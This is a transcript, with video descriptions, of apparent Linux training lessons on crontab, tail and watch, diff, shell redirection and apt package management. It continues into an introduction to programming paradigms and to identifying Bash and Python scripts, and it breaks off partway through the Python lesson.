So if I look in the current folder, there's three files currently. a_tale_of_two_cities, tale1, and tale2.
[Video description begins] He executes the following command: date. The output displays the system's date
and time. [Video description ends]
Now if we wait, once we pass the next minute, and we run ls again, we'll eventually see hello_from_crontab.
[Video description begins] He executes the following command: ls. The output lists files and directories.
[Video description ends]
[Video description begins] He executes the following command: date. The output displays the system's date
and time. He executes the following command: ls. The output lists files and directories. [Video description
ends]
Now we're not going to wait till Sunday at 2:30 in the morning to see if the other command runs, but you get
the idea. Now let's open up the crontab again, so crontab -e.
[Video description begins] He executes the following command: crontab -e. The GNU nano 2.9.3 editor opens.
A previous text file is open. [Video description ends]
And if we look at the options, now there's one thing I will mention. Let's say we put 5 for the minute and then * for everything else, so the entry reads 5 * * * *.
[Video description begins] He enters the following command: 5 * * * *. [Video description ends]
Now if we set a crontab with this setting, it's going to run at 5 minutes past the hour, every hour. So when the minute hand of the clock hits 5, it will run the script. If we want it to run every five minutes, we could list 0, 5, 10, 15, 20, 25, all the way up to 55 in the minute field. Or there's a shortcut. The shortcut is we can do */5. And this is the shorthand for running every five minutes. So let's close the file without
saving.
[Video description begins] He switches to the Terminal window. [Video description ends]
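For reference, each crontab line follows the same five time fields followed by the command to run. A minimal sketch (the script path is hypothetical):

# minute  hour  day-of-month  month  day-of-week  command
*/5       *     *             *      *            /home/steve/backup.sh   # every five minutes (hypothetical script)
30        2     *             *      0            ls                      # 2:30 in the morning every Sunday, as in this demo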
In this video, you will learn how to use the tail and watch commands for file and command monitoring.
Objectives
use the tail and watch commands for file and command monitoring
[Video description begins] Topic title: File Monitoring. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to use the tail and watch commands for file and command monitoring.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So tail is ideal for files that get appended to periodically. So the best example of this is log files. When an
event occurs, new lines get added to the file. So let's look at one file in particular. I'll do a tail on the /var/log/auth.log file. So any authorization or any escalation of privileges that is run as the root user will get
logged to the auth log.
[Video description begins] He executes the following command: tail /var/log/auth.log. The output displays last
ten lines of the /var/log/auth.log file. [Video description ends]
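By default, tail prints the last ten lines. If you want more or fewer, the -n option sets the count, and head does the same for the start of a file. A minimal sketch:

tail -n 25 /var/log/auth.log   # the last 25 lines
head -n 5 /var/log/auth.log    # the first 5 lines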
[Video description begins] He opens another Terminal window. The following prompt is displayed:
steve@vm1:~$. [Video description ends]
[Video description begins] He executes the following command: sudo ls /. The window prompts to enter
password for Steve.[Video description ends]
And now if I do a tail on auth.log, I see the results saying that sudo is run by steve from the path /home/steve, with the USER root, and the COMMAND is /bin/ls /.
[Video description begins] The output displays the list of files and directories. He switches to the first
Terminal window. He executes the following command: tail /var/log/auth.log. The output displays last ten
lines of the /var/log/auth.log file. [Video description ends]
So that's the full authentication entry for that command. We can also monitor a log file by running tail -f, which is short for follow. So we want to follow the log, /var/log/auth.log. Now I'll switch over to the other terminal window that I had opened and run sudo ls / one more time.
[Video description begins] He executes the following command: tail -f /var/log/auth.log. The output displays
last ten lines of the /var/log/auth.log file and updates it as the file changes. [Video description ends]
And as soon as I run it, the file that I'm following, that I'm tailing with -f in the other window, actually updates immediately.
[Video description begins] He executes the following command: sudo ls /. The output displays the list of files
and directories. He switches to the first Terminal window. [Video description ends]
So it constantly monitors this file for changes. So I'll use Ctrl + C to get out. And now we'll test the watch command.
[Video description begins] The following prompt is displayed: steve@vm1:~/Documents$. [Video description
ends]
So this runs a program periodically, so that you can monitor for changes. So one easy example is to call watch
of date.
[Video description begins] He executes the following command: watch date. An output window opens and
displays the system's date and time at regular intervals. [Video description ends]
So every two seconds, it runs the date command and updates it. So Friday, or Fri Mar 6 17:18:22, 24, 26, 28.
So it keeps updating every two seconds and then I can Control C out of it.
[Video description begins] He switches to the first Terminal window. [Video description ends]
Suppose I want it at a different resolution, a different wait. So I can do watch -n the number of seconds to wait.
The default is 2. We can set it to 1 or to 5 or just something else, so that the program runs faster or slower.
[Video description begins] He executes the following command: watch -n 1 date. The output window opens
and displays the system's date and time at an interval of 1 second. [Video description ends]
And then, this time when we do it, it updates every one second and the seconds are ticking up. As we watch it, we can also get it to highlight the changes.
[Video description begins] He switches to the first Terminal window. [Video description ends]
So with the -d option, it will highlight the changes. So it puts a little highlight over the number that's changing on every
tick of the seconds. So this is very helpful if we have a command that has a lot of information on the screen
and it's updating in different parts. We can see the highlights of the changes.
[Video description begins] In the output, he points to the header "Every 1.0s: date". [Video description ends]
Now it also has a header showing every 1.0s: date, the command.
[Video description begins] He switches to the first Terminal window. [Video description ends]
Let's suppose we want to hide that information and just have the contents. Well, we can add the -t.
[Video description begins] He executes the following command: watch -n 1 -d -t date. The output window
opens and displays the system's date and time at an interval of 1 second. The seconds are highlighted and the
aforementioned header is not displayed. [Video description ends]
So if we add the -t option, it doesn't show the header. It just shows the output of the program, the date program.
[Video description begins] He switches to the first Terminal window. [Video description ends]
Another way we can use watch is with the ls command. If I do watch ls -l, let's say, we'll watch the contents
of a directory.
[Video description begins] He executes the following command: watch ls -l. The output window opens and
displays the list of files and directories at regular intervals. [Video description ends]
So now if I go to the other terminal window, go into the Documents folder and I'll create another file.
[Video description begins] He switches to the second Terminal window. [Video description ends]
[Video description begins] He executes the following command: cd Documents/. No output displays and the
prompt changes to steve@vm1:~/Documents$. [Video description ends]
[Video description begins] He executes the following command: touch new_file. No output displays. He
switches to the output window. [Video description ends]
And if I go back, I see that file show up in my watch. So I just watched this directory for this new file to
appear. And that concludes this demonstration of file monitoring.
[Video description begins] Topic title: File Comparison. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to compare files using the diff command.
[Video description begins] The Terminal window opens: steve@vm1:~/Documents$. [Video description ends]
Often when tracking down errors, especially configuration errors on a system, diff comes to the rescue. When
you have a particular configuration and a reference to what the configuration file should be, you compare the
expected configuration with the actual system configuration, and the unexpected value shows itself
immediately. Not to mention comparing multiple versions of scripts or source code files to see what changes
have been made. So diff compares text files in a line by line fashion. And we'll look at a simple example to
highlight what you should expect to see. So I'll work with two versions of a file. So I'll do a cat and tale1,
which has the first four lines from A Tale of Two Cities by Charles Dickens.
[Video description begins] He executes the following command: cat tale1. The output displays the content of
the tale1 file. [Video description ends]
And I'll do cat tale2 which has something very similar but there are some minor changes. In tale2 there's an
extra space or an extra line, an empty line after it was the worst of times.
[Video description begins] He executes the following command: cat tale2. The output displays the content of
the tale2 file. [Video description ends]
And it was the age of Wisdom has a capital W instead of a lowercase W. And instead of it was the age of
foolishness, the second one has it was the age of craziness. So now let's do a straight diff of those two files. So
we'll do a diff of tale1 tale2. So I just specify the two files, and it gives me a diff.
[Video description begins] He executes the following command: diff tale1 tale2. The output displays the
differences in the files by comparing the files line by line. [Video description ends]
And what it does is the first line has 3,4c3,5. So it's comparing lines 3 and 4 in the first file with lines 3 to 5 in the second one.
[Video description begins] In the output, he points to 3,4c3,5. [Video description ends]
So we have the less than symbols pointing to the first file: it was the age of wisdom, it was the age of foolishness. Then three hyphens, and then greater than symbols pointing to the right, to the second file, tale2: the empty line, then it was the age of Wisdom, it was the age of craziness. Wisdom shows up because of the capital W. Now if I rerun the same command, but add in the option -i, it was the age of
Wisdom is no longer a difference.
[Video description begins] He executes the following command: diff -i tale1 tale 2. The output displays the
differences in the files by comparing the files line by line and ignoring the case differences in file
contents. [Video description ends]
Because the only difference was the case of the W: Wisdom with the capital W, and wisdom with the lowercase W. We can also show the differences using different output formats. There's the context format, so diff -c -i tale1 and tale2.
[Video description begins] He executes the following command: diff -c -i tale1 tale2. The output displays the
differences in the files in a contextual manner by comparing the files line by line and ignoring the case
differences in file contents. [Video description ends]
So you can see in this case, it shows the files and shows the differences with exclamation marks.
[Video description begins] In the output, he points to the exclamation marks present in front of the lines which
have differences. [Video description ends]
[Video description begins] In the output, he points to the + sign present in front of an empty line. [Video
description ends]
So lines 1 to 4 and 1 to 5. And it gives some information about tale1 and tale2, with dates and times, so the date and time stamps of the files.
[Video description begins] In the output, he points to the date and time of tale1 and tale2. [Video description
ends]
So it gives us some more information about the context of the differences. And there's also another format called -u, for unified, and I'll keep this case insensitive as well with the -i, with tale1 and tale2. So here it gives similar information to the context format, but it's a little bit more concise.
[Video description begins] He executes the following command: diff -u -i tale1 tale2. The output displays the
differences in the files in an unified manner by comparing the files line by line and ignoring the case
differences in file contents. [Video description ends]
[Video description begins] In the output, he points to -it was the age of foolishness, +it was the age of
craziness,. [Video description ends]
So minus it was the age of foolishness, plus it was the age of craziness. So it shows the two versions one after the other. And then it has the empty line. And then it was the age of wisdom, which is on that line in the first version.
[Video description begins] In the output, he points to the + sign present in front of an empty line. [Video
description ends]
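Two other options worth knowing: -q only reports whether the files differ at all, and -y prints them side by side in two columns. A minimal sketch with the same two files:

diff -q tale1 tale2   # prints "Files tale1 and tale2 differ" if there are any differences
diff -y tale1 tale2   # two-column, side-by-side comparison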
So different ways you can display the differences between files. And that concludes this demonstration of file
comparisons.
In this video, you will learn how to redirect the inputs and outputs of commands and files.
Objectives
[Video description begins] Topic title: Redirecting Input and Output. The presenter is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to redirect the inputs and outputs of commands and files.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
This makes it easy to take the output of one program and either create a file with it or append it to an existing
file. So let's look at some examples. So let's say I have the command echo and then in quotes, I specify Hello,
World!.
[Video description begins] He executes the following command: echo "Hello, World!". The output displays
line of text that is passed as an argument. [Video description ends]
So this just prints, "Hello, World!". Well, what if I want the results of this echo to be put into a file? Well, if I
take the command again, and put a greater than symbol, this is the redirection, the output redirection and I say,
hello.
[Video description begins] He executes the following command: echo "Hello, World!" > hello. No output
displays and the prompt remains the same. [Video description ends]
Now if I do a cat on the file hello that was just created, its contents are Hello, World!.
[Video description begins] He executes the following command: cat hello. The output displays the content of
the given filename. [Video description ends]
Let's do another echo. Let's say echo and "How are you?" and then I put a double greater than symbol. So this
is the append redirection and now do that to hello.
[Video description begins] He executes the following command: echo "How are you?" >> hello. No output
displays and the prompt remains the same. [Video description ends]
And now if I do a cat of hello, it has Hello, World! and then How are you?
[Video description begins] He executes the following command: cat hello. The output displays the content of
the given filename. [Video description ends]
So this is redirecting the standard output into a file. Now let's look at another command. I'll do a find, it's going
to look in the root folder of the system. Then -name, and I'm going to look for the name hello, which should
find the file "hello" that I've just created in this folder. But when I run this, find gets a number of errors saying
Permission denied.
[Video description begins] He executes the following command: find / -name "home". Permission denied
messages are displayed. [Video description ends]
So running as my current user steve, find can't look in all of the folders that it said Permission denied for. So I might want to do something with that output. So one thing I could do when I run this command is put a space at the end, then the number two, which is the standard error file descriptor, and then the greater-than symbol. So I'm redirecting the standard error output. So anytime there's an error like Permission denied, it will take that error. And I'm going to redirect it into /dev/null. So putting it in the null device just gets rid of the output; it goes to nothing.
[Video description begins] He executes the following command: find / -name "hello" 2>/dev/null. The output
reads: /home/steve/Documents/hello. [Video description ends]
And now, when I run it, it only shows me what I'm trying to find; it doesn't show all of the errors. Now, if I do an ls on /home/steve and I specify /root as well, it's going to do an ls on both of these folders and combine the results.
[Video description begins] He executes the following command: ls /home/steve /root. The output reads:
/home/steve: Desktop Documents Downloads Music Pictures Public snap Templates Videos. The window
prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
So in home/steve, it works perfectly fine. It returns the folders that are in that directory. But when I do an ls
on /root, it gives me Permission denied.
[Video description begins] He executes the following command: ls /home/steve /root > ls_results. The window
prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
Now if I want to output this to a file, let's say ls_results, and then do a cat of ls_results, it only shows me the results that were returned.
[Video description begins] He executes the following command: cat ls_results. The output reads: /home/steve:
Desktop Documents Downloads Music Pictures Public snap Templates Videos. [Video description ends]
And the error doesn't get logged. It doesn't get put into this file. But maybe that's what we want. So there's a clever way to take the output from our standard error, so where the Permission denied happens, and put it into our standard output. And to do that we write 2, then the redirect, so the greater-than symbol, then &1. So this redirects the output from the standard error to the standard output. And I want to do this on the ls command, so ls /home/steve /root 2 greater-than &1. So if you ever see this combination 2>&1, it's just redirecting the error to the standard output so that we can get the results.
[Video description begins] He executes the following command: ls /home/steve /root 2>&1. The output
reads: /home/steve: Desktop Documents Downloads Music Pictures Public snap Templates Videos. The
window prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
[Video description begins] He executes the following command: ls /home/steve /root 2>&1 > ls_results. The
window prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
And now if I do a cat of ls_results, the error still isn't there. I have a small mistake here: the order of the redirections matters.
[Video description begins] He executes the following command: cat ls_results. The output reads: /home/steve:
Desktop Documents Downloads Music Pictures Public snap Templates Videos. [Video description ends]
What we need to do is put the redirection to the file first. So ls /home/steve /root, then redirect it to the file, and then do the redirection of 2 to &1.
[Video description begins] He executes the following command: ls /home/steve /root > ls_results 2>&1. No
output displays and the prompt remains the same. [Video description ends]
And now if we look at the contents of ls_results, we see that we get the contents of home/steve.
[Video description begins] He executes the following command: cat ls_results. The output reads: /home/steve:
Desktop Documents Downloads Music Pictures Public snap Templates Videos ls: cannot open directory
'/root': Permission denied. [Video description ends]
And then the error cannot open directory /root Permission denied, all stored in the file. Now input redirection
works somewhat similarly. Let's say we do a word count with wc -l to count the number of lines of the file
tale1.
[Video description begins] He executes the following command: wc -l tale1. The output displays the number of
lines and the name of the given file. [Video description ends]
So this shows 4 tale1. So it shows the line count of the file along with the file name. Well, if we run wc -l and use the input redirection, so the less-than symbol, to take the contents of tale1 and redirect them to the command, it just shows the number of lines.
[Video description begins] He executes the following command: wc -l < tale1. The output displays the number
of lines of the given filename. [Video description ends]
It doesn't show the filename, and it might be preferable to get the result in this format. And this is the same as
doing cat of tale1 | wc -l and we get the same thing.
[Video description begins] He executes the following command: cat tale1 | wc -l. The output displays the
number of lines of the given filename. [Video description ends]
So you can think of it in those terms. And that concludes this demonstration of redirecting input and output.
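As a quick reference, the redirection operators from this demonstration can be summarized in a short sketch like this (the file names hello, ls_results, and tale1 are the ones used above; exact output will depend on your system):

echo "Hello, World!" > hello              # > creates or overwrites the file with the output
echo "How are you?" >> hello              # >> appends the output to the existing file
find / -name "hello" 2>/dev/null          # 2> redirects standard error; /dev/null discards it
ls /home/steve /root > ls_results 2>&1    # stdout goes to the file, then stderr follows stdout into it
wc -l < tale1                             # < feeds the file to the command as standard input
cat tale1 | wc -l                         # a pipe gives the same line count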
During this video, you will learn how to install, remove, and search for packages using apt.
Objectives
[Video description begins] Topic title: Package Management. The presenter is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to install, remove, and search packages using APT.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So APT is a standard package manager that connects to a software repository and installs common packages or programs. Now since we're running on an Ubuntu system, it will connect to the Ubuntu repositories. This also gives us a way to keep our systems up to date. Now to run APT, many of the commands need to be run as root.
[Video description begins] He executes the following command: sudo apt update. The window prompts to
enter password for Steve.[Video description ends]
So we'll do sudo apt update and this will update our list of local packages.
[Video description begins] The output displays that local package index is updated with the latest changes
made in the repositories. [Video description ends]
And once that completes, we can do sudo apt upgrade to upgrade any local packages that need upgrading.
[Video description begins] He executes the following command: sudo apt upgrade. The output displays that
local package index is upgraded. [Video description ends]
So currently, our packages are all up to date. We can remove packages. So let's check to see if a package
exists. So we'll do apt-cache, search, and we're going to search for the package nginx which is a web server.
[Video description begins] He executes the following command: apt-cache search nginx. The output displays
the search results for nginx. [Video description ends]
Now this gives us a whole list of possible nginx libraries and nginx, the actual web server. And I have this
installed locally and what I'm going to do is remove it. So I can do sudo apt remove nginx.
[Video description begins] He executes the following command: sudo apt remove nginx. The output displays
that nginx is removed. [Video description ends]
And this will remove the package from the local system, uninstalling it and stopping the program from running. If we want to remove it completely, we can do a purge: sudo apt purge nginx.
[Video description begins] He executes the following command: sudo apt purge nginx. The output displays
configuration and data files of nginx are deleted. [Video description ends]
So if there are any configuration files or any extra files left locally, it will completely remove those as well. And here we don't have any, so we're okay. Now we can reinstall it by doing sudo apt install nginx. And this will reinstall it.
[Video description begins] He executes the following command: sudo apt install nginx. The output displays
that nginx is installed. [Video description ends]
And if I do a curl of localhost, it actually returns the Welcome to nginx page.
[Video description begins] He executes the following command: curl localhost. The output displays the
Welcome to nginx! page and its HTML content. [Video description ends]
So those are the HTML contents of it, and we see the body of the HTML, so there are some tags here.
[Video description begins] In the output, he points to <body> <h1>Welcome to nginx!</h1>. [Video
description ends]
[Video description begins] In the output, he highlights Welcome to nginx! [Video description ends]
Now this is meant to be rendered by a web browser like Firefox. So what we see here is the plain-text, underlying HTML code for this document. But it's a good way of testing to see if it's actually working, if curl returns the web server contents like this after nginx has been installed. Now, a couple more commands that we use with apt. One is called autoclean. It removes files from the local package cache for any packages that are no longer in use or can no longer be downloaded from the repository. So quite often we'll do a sudo apt autoclean, and if there are any, it will remove them.
[Video description begins] He executes the following command: sudo apt autoclean. The output displays that
obsolete packages are removed. [Video description ends]
Another one that is related is autoremove. It cleans up any orphaned packages, such as library files or dependencies where the main package has been removed and they're no longer being referenced. We'll do sudo apt autoremove.
[Video description begins] He executes the following command: sudo apt autoremove. The output displays that
orphaned packages which are no longer needed are removed from the system. [Video description ends]
One thing that I do quite often is run sudo apt update, and then I use the double ampersand, &&, which means run update, and then run sudo apt upgrade after sudo apt update completes successfully. So the double && requires that update complete successfully before running upgrade, and then I do a && sudo apt autoremove && sudo apt autoclean.
[Video description begins] He executes the following command: sudo apt update && sudo apt upgrade &&
sudo apt autoremove && sudo apt autoclean. The output displays that local packages are updated and
upgraded and the orphaned and obsolete packages are removed. [Video description ends]
So I usually have this in a script and if I want to do a fresh update and upgrade, I just run all of these
commands in one go. And that concludes this demonstration on installing, removing, and searching packages
using APT.
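As a quick reference, the apt workflow from this demonstration could be collected like this (a sketch only; nginx is simply the example package used here):

sudo apt update              # refresh the local package index from the repositories
sudo apt upgrade             # upgrade any installed packages that have newer versions
apt-cache search nginx       # search the repository for a package
sudo apt install nginx       # install a package
sudo apt remove nginx        # uninstall a package, keeping its configuration files
sudo apt purge nginx         # uninstall a package and delete its configuration files too
sudo apt autoremove          # remove orphaned dependencies that are no longer referenced
sudo apt autoclean           # clear obsolete packages from the local package cache

# Or chain the maintenance steps so each runs only if the previous one succeeds:
sudo apt update && sudo apt upgrade && sudo apt autoremove && sudo apt autoclean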
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the commands available for the Linux command line to perform a number of
tasks, including working with text files and packages. We did this by exploring the common properties of
command line environments, the Bash shell and PowerShell environments. How to use commands to perform
text editing and text processing. How to perform repeat actions and use the Bash history. How to perform
process control tasks. Then how to schedule jobs, and perform command monitoring. How to perform file
monitoring and comparison. How to redirect the inputs/outputs of commands and files. And how to perform
package management tasks. In our next course, we'll move on to explore how to identify scripts and programs
written in a number of common programming languages, including Python, C, C++, and SQL.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
I've been a software developer and IT consultant for almost a quarter of a century. I've traveled around the
globe to serve clients responsible for building software architectures, hiring development teams, and solving
complex problems through code. With my toolbox of languages, platforms, frameworks and APIs, I round out
my coding experience with a formal background in mathematics and computer science from Mount Allison
University. In this course, we're going to explore code recognition of various programming languages used in
security applications and security exploits, including Python, C, C++, and SQL.
I'll start by examining the common programming paradigms and their features, and demonstrate how to
identify bash and Python scripts. I'll then explore the elements of a common C and C++ program, and compare
and contrast C# with the C and C++ languages. Next, I'll examine regular expressions in typical regex engines,
and show how to identify PowerShell scripts and the elements of a SQL statement. I'll then explore common
security vulnerabilities in code that can lead to exploits, and explore executable formats based on their binary
signatures. Lastly, I'll demonstrate how to verify the integrity of a downloaded file based on its hash value.
After completing this video, you will be able to describe common programming paradigms and classify them
based on their features.
Objectives
describe common programming paradigms and classify them based on their features
[Video description begins] Topic title: Coding Paradigms. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll describe common programming paradigms and classify them based on their features. I'll
explain the terminology used and what it means when describing a language. An analogy to this would be for
food. We describe food by its taste, texture, and appearance, and our personal description of the flavor.
Programming language descriptions usually focus on how the code is written in the particular language. So one of the first ways we can describe a language is as imperative. And we can think of this in grammatical terms.
So we're using imperative to order or request something, telling a program what to do about the program state.
This comes up in C, C++, and Python, and these are ones we're going to talk about in the coming videos.
Languages whose statements modify a program's state more directly are considered imperative. Although,
modern C++ and Python have more of what we call multi-paradigm features, where you can write code with
functional methods like lambdas.
But most of the language statements and constructs are usually done in the imperative. The next paradigm is
functional. So we humans are generally good at finding patterns, abstractions, and using mathematics. At least the mathematicians and computer scientists who work on these sorts of problems are good at creating these programming paradigms, which is why we have functional languages.
These are described as compositions of mathematical functions and expressions, rather than state-modifying commands. So implementations of this are Lisp, Scheme, and Haskell. Well, Lisp is short for List Processor; it's one of the oldest programming languages or approaches, based on lambda calculus. So its roots are more heavily embedded in mathematics. And Scheme is actually a popular dialect of Lisp in modern use. So one of the features that most Lisp languages have is that there are a lot of parentheses that enclose the lists.
So if you see a language with lots and lots of parentheses, that's a telltale sign. Jokingly, Lisp is often called Lost In Silly Parentheses, because there are so many of them. That's just one of the features of how things get built using a Lisp.
Lisp. Now Haskell's another approach, which is an example of a popular, newer and modern functional
language. And it's very different from Lisp in that it's only been around for 30 years, so it's new by functional
standards. And then we have domain specific languages, so languages built for a specific computing purpose.
We have things like shell scripting like Bash, PowerShell, and markup languages like Markdown and HTML.
And as well, you have things like modeling languages for tools like computer aided design. Whereas, many
other examples I have here of imperative and functional languages can be thought of as general purpose
programming languages. The domain specific languages fall in a category off to the side of that. Now Bash can
be considered an imperative language, but it's built for a specific purpose, so it falls under a domain specific
language category.
Some other descriptors we use, and some other categories, which are not all mutually exclusive. We have
things like object-oriented programming. So this is where we have classes with properties and methods, which
act as blueprints for objects to be used in our programs. We can create subclasses that inherit properties from
their parent classes, but modify or implement different properties or methods on their own.
We have declarative languages, which many functional languages fall under. So we have declarative languages
like query languages, functional programming, and regular expressions. The best way to describe a declarative
language is one that describes what needs to be done, but not the individual steps on how to do it. We have
multi-paradigm languages. So there's not just imperative or functional, they're not mutually exclusive. Or they
can have object-oriented features, etc.
You can program using different features and taking a functional approach, or maybe not. There's a choice in
the paradigm in the flavor you choose when coding. And then we have general-purpose programming. So these
are used to solve problems in multiple areas, and can be run in different environments and compiled for
different systems. These are languages like C, C++, Java, Python, these are all used to solve problems for
many different computing tasks and in computing environments.
This is in contrast to languages built for specific uses, like the command-line shell languages or markup languages or even machine control languages like CNC, where instructions are limited and cannot be used outside of their problem domain. Now I'll talk a bit more about imperative languages. So imperative languages
have statements. So these are written in the imperative to modify the state of a program. They have procedures,
functions, but not necessarily classes.
Some structures, like the C struct, have multiple properties, but don't have methods or inheritable traits like
object-oriented languages. The languages that are object-oriented can be written in the imperative. These
properties are not mutually exclusive. So you think of procedures as functions or subroutines that modify the
state of a program. So traditionally, languages more closely related to the machine code they're composed from
can be thought of as imperative.
So the low level instructions that describe the gates, and the transistors, and processors, and memory can be
thought of as imperative machines. And languages like C are abstractions of this machine code. Then we have
functional languages. So composition of functions, often where we express function composition as an
operator. Or oftentimes, we recursively compose functions that call themselves from within themselves. And
we do this more naturally in functional languages than we do in imperative languages.
We have combinators, or higher order functions like map, filter, fold, reduce. And compositions of these
methods such as the use of the MapReduce approaches. So this is characteristic of functional programming
languages. And then we have pure functions, which we often call side-effect free. So you can think of this as a
function that will always return the same result given the same arguments. So it won't include anything in its
calculations outside of the arguments you pass it. So no global variables or no other separate program state is
involved.
And then we have domain specific languages. So these are targeted for a particular platform or purpose. Some
are embedded in other programs. JavaScript started as a domain specific language for the web embedded in the
Netscape web browser. Now JavaScript has changed and since expanded into a general purpose language, and
it's not just used for the web anymore. Another example is a spreadsheet, using spreadsheet formulas and
macros. So these are embedded in the spreadsheet software, but aren't generally used outside of that
environment.
Often, domain specific languages are limited, and either prevent you from going outside, or don't have the features to go outside, of the domain they've been built for. But these limitations often help a language be less redundant, so there are
usually fewer ways to accomplish particular tasks. So it's less redundant in terms of how it can be used, which
is often a direct result of its limitations. So that concludes this presentation of common terminology and the
high level descriptions of common coding paradigms.
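As a small shell-flavored illustration of the imperative versus declarative distinction described above, here is a sketch in Bash (the .txt files are hypothetical; both snippets count roughly the same files in the current directory):

# Imperative: explicit steps that modify program state, here a counter variable
shopt -s nullglob        # so the glob expands to nothing when there are no .txt files
count=0
for f in *.txt; do
  count=$((count + 1))
done
echo "$count"

# More declarative in spirit: describe what you want and let the tools work out the steps
find . -maxdepth 1 -name '*.txt' | wc -l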
In this video, you will learn how to identify bash scripts based on their features.
Objectives
[Video description begins] Topic title: Identifying Bash Scripts. Your host for the session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to identify Bash scripts based on their features.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_bash_scripts$. [Video description ends]
So in this current folder in Documents/identifying_bash_scripts, I'm going to do an ls to see what file is in
here. So I have a file called hello_world. To see the contents of it, I can do a cat command, or I can open it up
in an editor like Nano. But for this example, I'm just going to use cat, because this is quite small. So I do a cat
of hello_world, here in the terminal window. So the first line is very important. It tells me that it is, indeed, a
Bash script, or it intends to be. There's a # symbol which in Bash is a comment, followed by an ! .
So the combination of # symbol and ! is called the hash bang, or for short, shebang. Then it defines the shell
script environment that it's going to run from, and we have /bin/bash. Now Bash scripts have the # symbol, or
octothorpe, or number sign, as their identifier for a comment. So anything that follows the # symbol is a
comment. Like I have here, this is a Bash comment. Then the next statement is echo, and in double quotes, I
have "Hello, World!". So echo is basically a print command that will just output, or echo, whatever we give it.
If we need to include quotations, you'll see backslashes within the string to include the quotations. So on the
following line, I have echo "Hello, and then world is in double quotes, but since it's within the string enclosed
in double quotes, we need to escape it with the backslash. So we have \"World and then \", again. We can also
access a number of built-in variables. And in this example, I access the PWD variable, which is in all
uppercase. So typically, the built-in variables, the environment variables have a $ sign followed by the variable
name.
So here I have echo and in double quotes, I have Current path: and then I have $PWD. If we're reading a
variable in Bash, it's done with the $ sign. We can get user input using the read command. So user input, I have
echo -n. So the -n suppresses the newline character. So every time you do an echo in Bash, it will
automatically put a new line after it unless you give it a -n. And then it has, "What is your name?". And then
the next line I have read name. So this is going to create a variable called name that's read when we input and
hit Enter when we run the code.
And then at the end, I have echo "Hello, $name!", and that's all in double quotes. Now we can quite often run
the command by just using ./ and then the name of the command. But in this case, it won't let me run it because
this file is not executable. So if I do ls -l, the file permissions for this file, for this hello_world, are read-write,
read-write and read. So this is for user group and everyone, but we'd like to be able to execute the file. So I can
do chmod +x hello_world.
And now if I do ls -l, it shows that the execute flag has been set, and then in this particular terminal, executable
programs are highlighted in green. So if I do ./hello_world, it will run the code. Now, our shell environment
knows how to run it because in the shebang at the top, we said we're going to use Bash. We could also type
bash hello_world, and it will run it just the same.
[Video description begins] The following field appears in the output: What is your name?. [Video description
ends]
And you can see when it stopped execution for What is your name, to allow me to input whatever I type and
hit Enter. And then it takes that into the variable and prints. And in this running of the program, it printed
Hello, joe!, which is what I typed. And you'll notice the Hello, "World", with the double quotes, the
backslashes are dropped when it's printed because they're only there to escape the double quotes. So the
backslashes don't actually get printed and that's what we want. And the PWD variable has the current path. So
the current working directory.
So whatever we've navigated to, in this case, it's in our home folder which at the command prompt is only the
tilde character. So, /home/steve/Documents/identifying_bash_scripts.
[Video description begins] In the output, he points at the Current path. [Video description ends]
And that concludes this demonstration of identifying Bash scripts.
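Based on this walkthrough, the hello_world script probably looks something like the following reconstruction (not necessarily the exact on-screen file, but it contains the elements described above):

#!/bin/bash
# This is a Bash comment
echo "Hello, World!"
echo "Hello, \"World\"!"
echo "Current path: $PWD"
echo -n "What is your name?"
read name
echo "Hello, $name!"

As shown in the demonstration, it can be run with bash hello_world, or made executable with chmod +x hello_world and then run as ./hello_world.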
In this video, you will learn how to identify Python scripts based on their features.
Objectives
[Video description begins] Topic title: Identifying Python Scripts. Your host for the session is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to identify Python scripts based on their features.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_python_scripts$. [Video description ends]
So lets have a look in the current folder in the identifying Python scripts folder. So I have two scripts. One is
hello_world2.py, and hello_world.py. So let's have a look at hello_world.py first, nano hello_world.py will
open the file.
[Video description begins] The hello_world.py file opens. It has thirteen lines of code. [Video description
ends]
And the first line, as in most shell scripts, we have the shebang. So we have the # symbol or octothorpe,
followed by an ! and then the program that's going to run in the shell environment. So we have /usr/bin/env
python3.
So this particular one is a python3 script. So in Python, it quite often starts with some imports, if there are any.
In this case there's an import sys, and then we have a function. So functions in Python are created with the def
keyword.
So def to define a function, then I call it my_function, and it defines a single parameter called param.
Now, indenting is very important in Python. Anything that's indented under a block of code, such as a function,
belongs to that function. But anything that's back at the same level or justified to the left like this print("Hello,
World!"), happens outside of the function.
So print("Hello, World!") is the first real line of code that we have that's actually going to carry out some
action. Then we have a call to my_function, so we just specify the function name my_function. We pass an argument, in this case the string Steve, which will call the function my_function, which should print Hello, Steve.
And then I have a statement, an if statement. So we have if true, which means that this if statement will always
be true.
[Video description begins] He points at code line 11. [Video description ends]
At the end of the if statement, it has a colon. Then the next line is indented to be inside of the if block. So the
print exiting with the ellipsis is inside the if, and then sys.exit. Now we don't explicitly need to call sys.exit.
[Video description begins] He points at code lines 12 and 13. [Video description ends]
So this is a way of gracefully exiting the code before you reach the end. But in this example, it's a little
unnecessary but I wanted to put it in to show how we access imports. So we import this sys object, and then we
call a function on the sys object. And our program will end. If it wasn't there, our program would still end
because it would reach the end of our code. So I'll exit this. And if I try, I can't just run hello_world.py directly. If we want to run it, we can type python3 hello_world.py, and it will run the code.
So we get Hello, World!, Hello Steve and Exiting. Now I can run it directly if I add the executable flag to it, so
